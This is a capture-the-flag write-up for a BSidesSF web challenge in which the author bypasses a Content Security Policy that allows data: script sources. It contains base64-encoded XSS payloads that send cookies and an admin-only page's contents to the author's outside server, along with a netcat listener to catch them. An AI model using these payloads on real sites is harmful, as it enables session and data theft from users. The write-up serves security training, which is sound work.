csp1 [web]

csp1

Can you bypass the CSP? Try to read /csp-one-flag as admin, all payloads submitted here will be sent to the admin.

Solve

CSP header:

content-security-policy: script-src 'self' data:; default-src 'self'; connect-src *; report-uri /csp_report

The CSP contains data:, so we can use this as a script source.

Working XSS 1:

alert(document.domain):

<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

Working XSS 2:

document.location="http://hawkje.net:4242/?c="+document.cookie:

<script src="data:;base64,ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9oYXdramUubmV0OjQyNDIvP2M9Iitkb2N1bWVudC5jb29raWU="></script>

Incoming request from server

$ nc -nvlp 4242
Listening on [0.0.0.0] (family 0, port 4242)

Connection from 34.83.155.121 37306 received!
GET /?c= HTTP/1.1
Host: xxx.net:4242
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/79.0.3945.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate

So no Cookie it seems.

Trying with XMLHttpRequest:

var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://csp-1-5aa1f221.challenges.bsidessf.net/csp-one-flag', true);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.onload = function () {
var request = new XMLHttpRequest();
request.open('GET', 'http://hawkje.net:4242/?'+xhr.responseText, true);
request.send()
};
xhr.send();

Chrome then blocks the second request in this because of mixed-content since I use HTTPS and HTTP. http://xxx.net:4242/?Ah%20ah%20ah,%20you%20didn%27t%20say%20the%20magic%20word

Flag

New version with twice HTTPS:

var xhr = new XMLHttpRequest();    
xhr.open('GET', 'https://csp-1-5aa1f221.challenges.bsidessf.net/csp-one-flag', true);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.onload = function () {
var request = new XMLHttpRequest();
request.open('GET', 'https://hawkje.net/catch.php?c=?'+xhr.responseText, true);
request.send()
};
xhr.send();

Base64 it and create payload:

<script src="data:;base64,dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyAgICAKeGhyLm9wZW4oJ0dFVCcsICdodHRwczovL2NzcC0xLTVhYTFmMjIxLmNoYWxsZW5nZXMuYnNpZGVzc2YubmV0L2NzcC1vbmUtZmxhZycsIHRydWUpOwp4aHIuc2V0UmVxdWVzdEhlYWRlcignQ29udGVudC10eXBlJywgJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpOwp4aHIub25sb2FkID0gZnVuY3Rpb24gKCkgewp2YXIgcmVxdWVzdCA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwpyZXF1ZXN0Lm9wZW4oJ0dFVCcsICdodHRwczovL2hhd2tqZS5uZXQvY2F0Y2gucGhwP2M9PycreGhyLnJlc3BvbnNlVGV4dCwgdHJ1ZSk7CnJlcXVlc3Quc2VuZCgpCn07Cnhoci5zZW5kKCk7"></script>

Received:

CTF{Cant_Stop_Pwning}